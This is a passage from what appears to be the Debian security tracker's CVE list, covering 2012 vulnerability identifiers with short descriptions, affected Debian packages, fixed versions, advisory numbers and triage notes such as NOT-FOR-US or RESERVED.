Net Developer, Net ...) NOT-FOR-US: Hitachi CVE-2012-0917 (Cross-site scripting (XSS) vulnerability in Hitachi IT Operations ...) NOT-FOR-US: Hitachi IT Operations Analyzer CVE-2012-0916 (Heap-based buffer overflow in RenRen Talk 2.9 allows remote attackers ...) NOT-FOR-US: RenRen Talk CVE-2012-0915 (Integer signedness error in RenRen Talk 2.9 allows remote attackers to ...) NOT-FOR-US: RenRen Talk CVE-2012-0914 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: admin view in the Panels module for Drupal CVE-2012-0913 (SQL injection vulnerability in checklogin.aspx in ICloudCenter ...) NOT-FOR-US: ICloudCenter ICTimeAttendance CVE-2012-0912 (SQL injection vulnerability in Stoneware webNetwork before 6.0.8.0 ...) NOT-FOR-US: Stoneware webNetwork CVE-2012-0911 (TikiWiki CMS/Groupware before 6.7 LTS and before 8.4 allows remote ...) - tikiwiki NOTE: http://seclists.org/bugtraq/2012/Jul/19 CVE-2012-0910 RESERVED CVE-2012-0909 (Cross-site scripting (XSS) vulnerability in Horde_Form in Horde ...) - horde3 3.3.12+debian0-2.2 (low) [squeeze] - horde3 (Minor issue) CVE-2012-0907 (Directory traversal vulnerability in the web player in NeoAxis NeoAxis ...) NOT-FOR-US: NeoAxis NeoAxis web player CVE-2012-0906 (SQL injection vulnerability in the Moviebase addon for deV!L'z ...) NOT-FOR-US: deV!L'z Clanportal CVE-2012-0905 (SQL injection vulnerability in deV!L'z Clanportal (DZCP) Gamebase ...) NOT-FOR-US: deV!L'z Clanportal CVE-2012-0904 (VLC media player 1.1.11 allows remote attackers to cause a denial of ...) - vlc (not reproducible, no public fix from the vlc team either) CVE-2012-0903 (Multiple cross-site scripting (XSS) vulnerabilities in Zimbra Desktop ...) NOT-FOR-US: Zimbra Desktop CVE-2012-0902 (AirTies Air 4450 1.1.2.18 allows remote attackers to cause a denial of ...) NOT-FOR-US: AirTies Air CVE-2012-0901 (Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo ...) NOT-FOR-US: YouSayToo auto-publishing plugin for WordPress CVE-2012-0900 (Multiple cross-site scripting (XSS) vulnerabilities in Beehive Forum ...) NOT-FOR-US: Beehive Forum CVE-2012-0899 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Annuaire PHP CVE-2012-0898 (Directory traversal vulnerability in meb_download.php in the ...) NOT-FOR-US: myEASYbackup plugin for WordPress CVE-2012-0897 (Stack-based buffer overflow in the JPEG2000 plugin in IrfanView ...) NOT-FOR-US: IrfanView PlugIns CVE-2012-0896 (Absolute path traversal vulnerability in download.php in the Count Per ...) NOT-FOR-US: Count Per Day module for WordPress CVE-2012-0895 (Cross-site scripting (XSS) vulnerability in map/map.php in the Count ...) NOT-FOR-US: Count Per Day module for WordPress CVE-2012-0894 RESERVED CVE-2012-0893 RESERVED CVE-2012-0892 RESERVED CVE-2012-0891 RESERVED CVE-2012-0890 RESERVED CVE-2012-0889 RESERVED CVE-2012-0888 RESERVED CVE-2012-0887 RESERVED CVE-2012-0886 RESERVED CVE-2012-0908 (Cross-site scripting (XSS) vulnerability in logout.php in ...) {DSA-2387-1} - simplesamlphp 1.8.2-1 NOTE: http://code.google.com/p/simplesamlphp/issues/detail?id=468 CVE-2012-0884 (The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 ...) {DSA-2454-1} - openssl 1.0.0h-1 (low) NOTE: "If a Linux distribution picks up the fix for CVE-2012-0884 then they will want to pick up change 22161 at the same time" -- http://www.openwall.com/lists/oss-security/2012/03/23/12 CVE-2012-0883 (envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 ...) - apache2 (LD_LIBRARY_PATH not set in debian package) CVE-2012-0882 (Buffer overflow in yaSSL, as used in MySQL 5.5.20 and possibly other ...) - mysql-5.5 (bug #675872) - cyassl (bug #598391) - libyassl (bug #664533) NOTE: limited information about issue, only a video of exploit taking place CVE-2012-0881 RESERVED CVE-2012-0880 RESERVED CVE-2012-0879 (The I/O implementation for block devices in the Linux kernel before ...) {DSA-2469-1} - linux-2.6 2.6.33-1 CVE-2012-0878 (Paste Script 1.7.5 and earlier does not properly set group memberships ...) - pastescript 1.7.5-2 (low; bug #661061) [squeeze] - pastescript (Minor issue) NOTE: https://groups.google.com/d/topic/paste-users/KqZRujMcJHE/discussion CVE-2012-0877 RESERVED CVE-2012-0876 (The XML parser (xmlparse.c) in expat before 2.1.0 computes hash values ...) {DSA-2525-1} - expat 2.1.0~beta3-1 (bug #663579) - xmlrpc-c 1.16.33-3.2 (low; bug #687672) [squeeze] - xmlrpc-c (Minor issue) - python2.6 (configured with --with-system-expat since 2.6.6-4) CVE-2012-0875 [systemtap invalid read leading to kernel DoS] RESERVED - systemtap 1.7-1 (low; bug #660929; bug #660886) [squeeze] - systemtap (Vulnerable code not present) [lenny] - systemtap (Vulnerable code not present) CVE-2012-0874 (The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-0873 (Multiple cross-site scripting (XSS) vulnerabilities in Boonex Dolphin ...) NOT-FOR-US: Boonex Dolphin CVE-2012-0872 (Multiple cross-site scripting (XSS) vulnerabilities in OxWall 1.1.1 ...) NOT-FOR-US: OxWall CVE-2012-0871 RESERVED - systemd 43-1 CVE-2012-0870 (Heap-based buffer overflow in process.c in smbd in Samba 3.0, as used ...) - samba 2:3.4.0~pre1-1 [lenny] - samba (pre-release issue) [squeeze] - samba (pre-release issue) CVE-2012-0868 (CRLF injection vulnerability in pg_dump in PostgreSQL 8.3.x before ...) {DSA-2418-1} - postgresql-9.1 9.1.3-1 - postgresql-8.4 8.4.11-1 CVE-2012-0867 (PostgreSQL 8.4.x before 8.4.11, 9.0.x before 9.0.7, and 9.1.x before ...) {DSA-2418-1} - postgresql-9.1 9.1.3-1 - postgresql-8.4 8.4.11-1 CVE-2012-0866 (CREATE TRIGGER in PostgreSQL 8.3.x before 8.3.18, 8.4.x before 8.4.11, ...) {DSA-2418-1} - postgresql-9.1 9.1.3-1 - postgresql-8.4 8.4.11-1 CVE-2012-0865 (Multiple open redirect vulnerabilities in CubeCart 3.0.20 and earlier ...) NOT-FOR-US: CubeCart CVE-2012-0864 (Integer overflow in the vfprintf function in stdio-common/vfprintf.c ...) - eglibc 2.13-31 (low; bug #660611) [squeeze] - eglibc 2.11.3-4 CVE-2012-0863 (Mumble 1.2.3 and earlier uses world-readable permissions for ...) {DSA-2411-1} - mumble 1.2.3-3 (bug #659039) CVE-2012-0862 (builtins.c in Xinetd before 2.3.15 does not check the service type ...) - xinetd 1:2.3.14-7.1 (bug #672381) [squeeze] - xinetd (Minor issue) CVE-2012-0861 (The vds_installer in Red Hat Enterprise Virtualization Manager ...) NOT-FOR-US: Red Hat Enterprise Virtualisation CVE-2012-0860 (Multiple untrusted search path vulnerabilities in Red Hat Enterprise ...) NOT-FOR-US: Red Hat Enterprise Virtualisation CVE-2012-0859 (The render_line function in the vorbis codec (vorbis.c) in libavcodec ...) {DSA-2471-1} - libav 6:0.8.3-1 - ffmpeg [squeeze] - ffmpeg 4:0.5.10-1 (bug #688849) CVE-2012-0858 (The Shorten codec (shorten.c) in libavcodec in FFmpeg 0.7.x before ...) {DSA-2624-1} - libav 4:0.8.1-1 [squeeze] - ffmpeg 4:0.5.9-1 CVE-2012-0857 (Multiple buffer overflows in the get_qcx function in the J2K decoder ...) - libav (Vulnerable code not present) - ffmpeg (Vulnerable code not present) CVE-2012-0856 (Heap-based buffer overflow in the MPV_frame_start function in ...) - libav (Vulnerable code not present) - ffmpeg (Vulnerable code not present) CVE-2012-0855 (Heap-based buffer overflow in the get_sot function in the J2K decoder ...) - libav (Vulnerable code not present) - ffmpeg (Vulnerable code not present) CVE-2012-0854 (The dpcm_decode_frame function in libavcodec/dpcm.c in FFmpeg before ...) - libav 4:0.8.1-1 - ffmpeg (Vulnerable code not present) CVE-2012-0853 (The decodeTonalComponents function in the Actrac3 codec (atrac3.c) in ...) {DSA-2471-1} - libav 4:0.8.1-1 - ffmpeg CVE-2012-0852 (The adpcm_decode_frame function in adpcm.c in libavcodec in FFmpeg ...) {DSA-2494-1} - libav 4:0.8.1-1 - ffmpeg CVE-2012-0851 (The ff_h264_decode_seq_parameter_set function in h264_ps.c in ...) {DSA-2494-1} - libav 6:0.8.3-1 - ffmpeg CVE-2012-0850 (The sbr_qmf_synthesis function in libavcodec/aacsbr.c in FFmpeg before ...) - libav 4:0.8.1-1 - ffmpeg (Vulnerable code not present) CVE-2012-0849 (Integer overflow in the ff_j2k_dwt_init function in ...) - libav (Vulnerable code not present) - ffmpeg (Vulnerable code not present) CVE-2012-0848 (Heap-based buffer overflow in the ws_snd_decode_frame function in ...) - libav 4:0.8.1-1 - ffmpeg (Code in 0.5 not affected per upstream) CVE-2012-0847 (Heap-based buffer overflow in the avfilter_filter_samples function in ...) - libav (Vulnerable code not present) - ffmpeg (Vulnerable code not present) CVE-2012-0846 (Cross-site scripting (XSS) vulnerability in Craig Knudsen WebCalendar ...) - webcalendar CVE-2012-0845 (SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, ...) - python3.1 (low) [squeeze] - python3.1 (Minor issue) - python3.2 3.2.3~rc1-1 - python2.7 2.7.3~rc1-1 - python2.6 2.6.8-0.1 [squeeze] - python2.6 (Minor issue) - python2.5 [squeeze] - python2.5 (Minor issue) CVE-2012-0844 RESERVED - netsurf 2.8-2 (bug #659376) CVE-2012-0843 RESERVED - uzbl 0.0.0~git.20111128-2 (bug #659379) [squeeze] - uzbl (Minor issue) CVE-2012-0842 [surf info leak] RESERVED - surf 0.4.1-6 (bug #659296) CVE-2012-0841 (libxml2 before 2.8.0 computes hash values without restricting the ...) {DSA-2417-1} - libxml2 2.7.8.dfsg-8 (bug #660846) CVE-2012-0840 (tables/apr_hash.c in the Apache Portable Runtime (APR) library through ...) - apr 1.4.6-1 (low; bug #655435) [squeeze] - apr (exploitability in httpd extremely limited, not known to be exploitable in svn) NOTE: Commit http://mail-archives.apache.org/mod_mbox/apr-commits/201201.mbox/%3C20120115003715.071D423888FD@eris.apache.org%3E seems to cause regressions CVE-2012-0839 (OCaml 3.12.1 and earlier computes hash values without restricting the ...) - ocaml 4.00.0~beta2-1 (low; bug #659149) [wheezy] - ocaml (Minor issue) [squeeze] - ocaml (Minor issue) CVE-2012-0838 (Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL ...) - libstruts1.2-java (struts 2 issue) CVE-2012-0837 (Joomla! 1.7.x before 1.7.5 and 2.5.x before 2.5.1 allows attackers to ...) - joomla (bug #571794) CVE-2012-0836 (Unspecified vulnerability in Joomla! 1.7.x before 1.7.5 allows ...) - joomla (bug #571794) CVE-2012-0835 (Unspecified vulnerability in Joomla! 1.7.x before 1.7.5 and 2.5.x ...) - joomla (bug #571794) CVE-2012-0834 (Cross-site scripting (XSS) vulnerability in lib/QueryRender.php in ...) - phpldapadmin 1.2.2-1 (bug #658907) CVE-2012-0833 (The acllas__handle_group_entry function in ...) - 389-ds-base (Fixed before initial upload) CVE-2012-0832 RESERVED CVE-2012-0831 (PHP before 5.3.10 does not properly perform a temporary change to the ...) {DSA-2408-1} - php5 5.3.10-1 CVE-2012-0830 (The php_register_variable_ex function in php_variables.c in PHP 5.3.9 ...) {DSA-2403-1} - php5 5.3.10-1 NOTE: http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/ CVE-2012-0829 (Multiple cross-site request forgery (CSRF) vulnerabilities in Mibew ...) NOT-FOR-US: Mibew Messenger CVE-2012-0828 RESERVED - xchat (Only affects Xchat on Windows and Maemo) CVE-2012-0827 RESERVED - drupal7 7.11-1 - drupal6 CVE-2012-0826 RESERVED - drupal7 7.11-1 - drupal6 6.26-1 CVE-2012-0825 RESERVED - drupal7 7.11-1 - drupal6 6.26-1 CVE-2012-0824 RESERVED - gnusound (low; bug #654270) [squeeze] - gnusound 0.7.5-3+squeeze1 CVE-2012-0823 (VP8 Codec SDK (libvpx) before 1.0.0 "Duclair" allows remote attackers ...) - libvpx 1.0.0-1 [squeeze] - libvpx (Introduced in 0.9.7) NOTE: http://blog.webmproject.org/2012/01/vp8-codec-sdk-duclair-released.html CVE-2012-0822 (Cross-site scripting (XSS) vulnerability in Joomla! 1.6 and 1.7.x ...) - joomla (bug #571794) CVE-2012-0821 (Unspecified vulnerability in Joomla! 1.6.x and 1.7.x before 1.7.4 ...) - joomla (bug #571794) CVE-2012-0820 (Cross-site scripting (XSS) vulnerability in Joomla! 1.6.x and 1.7.x ...) - joomla (bug #571794) CVE-2012-0819 (Unspecified vulnerability in Joomla! 1.6.x and 1.7.x before 1.7.4 ...) - joomla (bug #571794) CVE-2012-0818 (RESTEasy before 2.3.1 allows remote attackers to read arbitrary files ...) NOT-FOR-US: RESTEasy framework for JBoss CVE-2012-0817 (Memory leak in smbd in Samba 3.6.x before 3.6.3 allows remote ...) - samba 2:3.6.3-1 (low) - samba4 4.0.0~alpha18.dfsg1-1 [squeeze] - samba (Only affects 3.6.x) [lenny] - samba (Only affects 3.6.x) CVE-2012-0816 RESERVED CVE-2012-0815 (The headerVerifyInfo function in lib/header.c in RPM before 4.9.1.3 ...) - rpm 4.9.1.3-1 (bug #667031) CVE-2012-0814 (The auth_parse_options function in auth-options.c in sshd in OpenSSH ...) - openssh 1:5.6p1-1 (low; bug #657445) [squeeze] - openssh 1:5.5p1-6+squeeze2 CVE-2012-0813 (Wicd before 1.7.1 saves sensitive information in log files in ...) - wicd 1.7.1~b3-4 (unimportant; bug #652417) NOTE: Not a security issue per se, logfile only accessible by root:adm CVE-2012-0812 [PostfixAdmin 2.3.4 multiple XSS vulnerabilities] RESERVED - postfixadmin 2.3.5-1 NOTE: http://seclists.org/oss-sec/2012/q1/285 CVE-2012-0811 [PostfixAdmin 2.3.4 multiple SQL vulnerabilities] RESERVED - postfixadmin 2.3.5-1 NOTE: http://seclists.org/oss-sec/2012/q1/285 CVE-2012-0810 RESERVED - linux-2.6 3.2.16-1 (bug #672660) [squeeze] - linux-2.6 (rt patchset not yet present) NOTE: Ben Hutchings said it was fixed in 3.2.9-1, I checked it for 3.2.16-1 CVE-2012-0809 (Format string vulnerability in the sudo_debug function in Sudo 1.8.0 ...) - sudo 1.8.3p2-1 (bug #657985) [squeeze] - sudo (Vulnerable code not present) [lenny] - sudo (Vulnerable code not present) CVE-2012-0808 (as31 2.3.1-4 does not seed the random number generator and generates ...) - as31 2.3.1-5 (bug #655496) [squeeze] - as31 (The maintainer consider it a minor issue. Check comments in the bug report) CVE-2012-0807 (Stack-based buffer overflow in the suhosin_encrypt_single_cookie ...) - php-suhosin 0.9.33-1 (low; bug #657190) [squeeze] - php-suhosin (Exploitable in rare setups) NOTE: https://github.com/stefanesser/suhosin/commit/73b1968ee30f6d9d2dae497544b910e68e114bfa CVE-2012-0806 (Buffer overflow in Bip 0.8.8 and earlier might allow remote ...) {DSA-2393-1} - bip 0.8.8-2 (bug #657217) [lenny] - bip (Maintainer reports vulnerable code not present) CVE-2012-0805 (Multiple SQL injection vulnerabilities in SQLAlchemy before 0.7.0b4, ...) {DSA-2449-1} - sqlalchemy 0.6.7-1 CVE-2012-0804 (Heap-based buffer overflow in the proxy_connect function in ...) {DSA-2407-1} - cvs 2:1.12.13+real-7 CVE-2012-0803 RESERVED NOT-FOR-US: Apache CXF CVE-2012-0802 (Multiple buffer overflows in Spamdyke before 4.3.0 might allow remote ...) NOT-FOR-US: spamdyke CVE-2012-0801 (lib/formslib.php in Moodle 2.1.x before 2.1.4 and 2.2.x before 2.2.1 ...) - moodle (Only affects 2.x) CVE-2012-0800 (The form-autocompletion functionality in Moodle 2.0.x before 2.0.7, ...) - moodle (Only affects 2.x) CVE-2012-0799 (Moodle 2.0.x before 2.0.7 and 2.1.x before 2.1.4, when an anonymous ...) - moodle (Only affects 2.x) CVE-2012-0798 (The self-enrolment functionality in Moodle 2.1.x before 2.1.4 and ...) - moodle (Only affects 2.x) CVE-2012-0797 (The webservices functionality in Moodle 2.0.x before 2.0.7, 2.1.x ...) - moodle (Only affects 2.x) CVE-2012-0796 (class.phpmailer.php in the PHPMailer library, as used in Moodle 1.9.x ...) {DSA-2421-1} - moodle 1.9.9.dfsg2-5 CVE-2012-0795 (Moodle 1.9.x before 1.9.16, 2.0.x before 2.0.7, 2.1.x before 2.1.4, ...) {DSA-2421-1} - moodle 1.9.9.dfsg2-5 CVE-2012-0794 (The rc4encrypt function in lib/moodlelib.php in Moodle 1.9.x before ...) {DSA-2421-1} - moodle 1.9.9.dfsg2-5 CVE-2012-0793 (Moodle 1.9.x before 1.9.16, 2.0.x before 2.0.7, 2.1.x before 2.1.4, ...) {DSA-2421-1} - moodle 1.9.9.dfsg2-5 CVE-2012-0792 (mod/forum/user.php in Moodle 1.9.x before 1.9.16 allows remote ...) {DSA-2421-1} - moodle 1.9.9.dfsg2-5 CVE-2012-0791 (Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP ...) {DSA-2485-1} - imp4 4.3.10+debian0-1.1 (bug #659392) CVE-2012-0790 (Cross-site scripting (XSS) vulnerability in smokeping_cgi in Smokeping ...) {DSA-2651-1} - smokeping 2.6.8-2 (bug #659899) CVE-2012-0789 (Memory leak in the timezone functionality in PHP before 5.3.9 allows ...) - php5 5.3.9-1 (low) [squeeze] - php5 (Too introsive to backport) CVE-2012-0788 (The PDORow implementation in PHP before 5.3.9 does not properly ...) {DSA-2408-1} - php5 5.3.9-1 CVE-2012-0787 RESERVED CVE-2012-0786 RESERVED CVE-2012-0885 (chan_sip.c in Asterisk Open Source 1.8.x before 1.8.8.2 and 10.x ...) - asterisk 1:1.8.8.2~dfsg-1 (bug #656596) [squeeze] - asterisk (Vulnerable code not present) [lenny] - asterisk (Vulnerable code not present) NOTE: AST-2012-001 http://downloads.asterisk.org/pub/security/AST-2012-001.html CVE-2012-0784 RESERVED CVE-2012-0783 RESERVED CVE-2012-0782 (** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in ...) - wordpress (unimportant) NOTE: https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt CVE-2012-0781 (The tidy_diagnose function in PHP 5.3.8 might allow remote attackers ...) {DSA-2408-1} - php5 5.3.9-1 (low) CVE-2012-0780 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...) NOT-FOR-US: Adobe Illustrator CVE-2012-0779 (Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-0778 (Buffer overflow in Adobe Flash Professional before CS6 allows ...) NOT-FOR-US: Adobe Flash CVE-2012-0777 (The JavaScript API in Adobe Reader and Acrobat 9.x before 9.5.1 and ...) NOT-FOR-US: Adobe Reader CVE-2012-0776 (The installer in Adobe Reader 9.x before 9.5.1 and 10.x before 10.1.3 ...) NOT-FOR-US: Adobe Reader CVE-2012-0775 (The JavaScript implementation in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader CVE-2012-0774 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.1 and 10.x ...) NOT-FOR-US: Adobe Reader CVE-2012-0773 (The NetStream class in Adobe Flash Player before 10.3.183.18 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-0772 (An unspecified ActiveX control in Adobe Flash Player before ...) NOT-FOR-US: Adobe Flash Player CVE-2012-0771 RESERVED CVE-2012-0770 (Adobe ColdFusion 8.0, 8.0.1, 9.0, and 9.0.1 computes hash values for ...) NOT-FOR-US: Adobe ColdFusion CVE-2012-0769 (Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-0768 (The Matrix3D component in Adobe Flash Player before 10.3.183.16 and ...) NOT-FOR-US: Adobe Flash Player CVE-2012-0767 (Cross-site scripting (XSS) vulnerability in Adobe Flash Player before ...) NOT-FOR-US: Adobe Flash CVE-2012-0766 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0765 (Multiple cross-site scripting (XSS) vulnerabilities in Adobe RoboHelp ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0764 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0763 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0762 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0761 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0760 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0759 (Adobe Shockwave Player before 11.6.4.634 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0758 (Heap-based buffer overflow in Adobe Shockwave Player before 11.6.4.634 ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0757 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-0756 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...) NOT-FOR-US: Adobe Flash CVE-2012-0755 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...) NOT-FOR-US: Adobe Flash CVE-2012-0754 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...) NOT-FOR-US: Adobe Flash CVE-2012-0753 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...) NOT-FOR-US: Adobe Flash CVE-2012-0752 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...) NOT-FOR-US: Adobe Flash CVE-2012-0751 (The ActiveX control in Adobe Flash Player before 10.3.183.15 and 11.x ...) NOT-FOR-US: Adobe Flash CVE-2012-0750 RESERVED CVE-2012-0749 RESERVED CVE-2012-0748 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: IBM Rational Team Concert CVE-2012-0747 (SQL injection vulnerability in IBM Maximo Asset Management 6.2 through ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-0746 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-0745 (The getpwnam function in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.1.0.10 ...) NOT-FOR-US: IBM AIX CVE-2012-0744 (IBM Rational ClearQuest 7.1.x through 7.1.2.7 and 8.x through 8.0.0.3 ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-0743 (IBM Tivoli Directory Server (TDS) 6.3 and earlier allows remote ...) NOT-FOR-US: IBM Tivoli Directory Server CVE-2012-0742 (IBM Tivoli Event Pump 4.2.2, when the LOG_REQUESTS and ...) NOT-FOR-US: IBM Tivoli Event Pump CVE-2012-0741 (IBM Security AppScan Enterprise before 8.6.0.2 and Rational Policy ...) NOT-FOR-US: (IBM Security AppScan Enterprise CVE-2012-0740 (Cross-site scripting (XSS) vulnerability in the Web Admin Tool in IBM ...) NOT-FOR-US: IBM Tivoli Directory Server CVE-2012-0739 RESERVED CVE-2012-0738 (IBM Security AppScan Enterprise before 8.6.0.2 and Rational Policy ...) NOT-FOR-US: (IBM Security AppScan Enterprise CVE-2012-0737 (Cross-site scripting (XSS) vulnerability in IBM Rational AppScan ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0736 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0735 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0734 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0733 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1, when ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0732 (The Enterprise Console client in IBM Rational AppScan Enterprise 5.x ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0731 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0730 (Multiple cross-site request forgery (CSRF) vulnerabilities in IBM ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0729 (Unrestricted file upload vulnerability in IBM Rational AppScan ...) NOT-FOR-US: IBM Rational AppScan CVE-2012-0728 (SQL injection vulnerability in IBM Maximo Asset Management 7.1 through ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-0727 (SQL injection vulnerability in IBM Maximo Asset Management 7.5, as ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-0726 (The default configuration of TLS in IBM Tivoli Directory Server (TDS) ...) NOT-FOR-US: IBM Tivoli Directory Server CVE-2012-0725 (Adobe Flash Player before 11.2.202.229 in Google Chrome before ...) NOT-FOR-US: Adobe Flash Player CVE-2012-0724 (Adobe Flash Player before 11.2.202.229 in Google Chrome before ...) NOT-FOR-US: Adobe Flash Player CVE-2012-0723 (The kernel in IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, ...) NOT-FOR-US: IBM AIX, VIOS CVE-2012-0721 RESERVED CVE-2012-0720 (Cross-site scripting (XSS) vulnerability in the Integration Solution ...) NOT-FOR-US: IBM WebSphere Application CVE-2012-0719 (Cross-site scripting (XSS) vulnerability in IBM Tivoli Endpoint ...) NOT-FOR-US: IBM Tivoli Endpoint Manager CVE-2012-0718 RESERVED CVE-2012-0717 (IBM WebSphere Application Server 7.0 before 7.0.0.23, when a certain ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-0716 (Cross-site scripting (XSS) vulnerability in the Administration Console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-0715 (Cross-site scripting (XSS) vulnerability in the Gantt applet viewer in ...) NOT-FOR-US: IBM Tivoli Change and Configuration Management Database CVE-2012-0714 (Cross-site request forgery (CSRF) vulnerability in IBM Maximo Asset ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-0713 (Unspecified vulnerability in the XML feature in IBM DB2 9.7 before FP6 ...) NOT-FOR-US: IBM DB2 CVE-2012-0712 (The XML feature in IBM DB2 9.5 before FP9, 9.7 through FP5, and 9.8 ...) NOT-FOR-US: IBM DB2 CVE-2012-0711 (Integer signedness error in the db2dasrrm process in the DB2 ...) NOT-FOR-US: IBM DB2 CVE-2012-0710 (IBM DB2 9.1 before FP11, 9.5 before FP9, 9.7 before FP5, and 9.8 ...) NOT-FOR-US: IBM DB2 CVE-2012-0709 (IBM DB2 9.5 before FP9, 9.7 through FP5, and 9.8 through FP4 does not ...) NOT-FOR-US: IBM DB2 CVE-2012-0708 (Heap-based buffer overflow in the Ole API in the CQOle ActiveX control ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-0707 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Lombardi ...) NOT-FOR-US: IBM WebSphere CVE-2012-0706 (IBM Scale Out Network Attached Storage (SONAS) 1.3 before 1.3.2.3 ...) NOT-FOR-US: IBM Scale Out network Attached Storage (SONAS) CVE-2012-0705 (InfoSphere Import Export Manager in InfoSphere Information Server ...) NOT-FOR-US: InfoSphere Information Server CVE-2012-0704 RESERVED CVE-2012-0703 (Open redirect vulnerability in Information Services Framework (ISF) in ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2012-0702 (Information Services Framework (ISF) in IBM InfoSphere Information ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2012-0701 (The client applications in the DataStage Administrator client in ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2012-0700 (The client in InfoSphere FastTrack 8.1 through 8.7 in IBM InfoSphere ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2012-0699 RESERVED CVE-2012-0698 (tcsd in TrouSerS before 0.3.10 allows remote attackers to cause a ...) {DSA-2576-1} - trousers 0.3.9-1 (low; bug #692649) CVE-2011-5066 (The SibRaRecoverableSiXaResource class in the Default Messaging ...) NOT-FOR-US: WebSphere CVE-2011-5065 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Application ...) NOT-FOR-US: WebSphere CVE-2011-5064 (DigestAuthenticator.java in the HTTP Digest Access Authentication ...) {DSA-2401-1} - tomcat6 6.0.32-7 - tomcat7 7.0.12 - tomcat5.5 CVE-2011-5063 (The HTTP Digest Access Authentication implementation in Apache Tomcat ...) {DSA-2401-1} - tomcat6 6.0.32-7 - tomcat7 7.0.12 - tomcat5.5 CVE-2011-5062 (The HTTP Digest Access Authentication implementation in Apache Tomcat ...) {DSA-2401-1} - tomcat6 6.0.32-7 - tomcat7 7.0.12 - tomcat5.5 CVE-2011-5061 (functions.php in WHMCompleteSolution (WHMCS) 4.0.x through 5.0.x ...) NOT-FOR-US: WHMCompleteSolution CVE-2011-5060 (The par_mktmpdir function in the PAR module before 1.003 for Perl ...) - libpar-perl 1.005-1 (bug #650707) [squeeze] - libpar-perl 1.000-1+squeeze1 CVE-2010-5082 (Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in ...) NOT-FOR-US: Windows Server CVE-2010-XXXX [webkit info disclosure/segfault] - chromium-browser CVE-2012-0697 (HP StorageWorks P2000 G3 MSA array systems have a default account, ...) NOT-FOR-US: HP StorageWorks CVE-2012-0696 (Multiple cross-site scripting (XSS) vulnerabilities in the Executive ...) NOT-FOR-US: IBM Cognos CVE-2012-0695 (Multiple unspecified vulnerabilities in Google Chrome before ...) 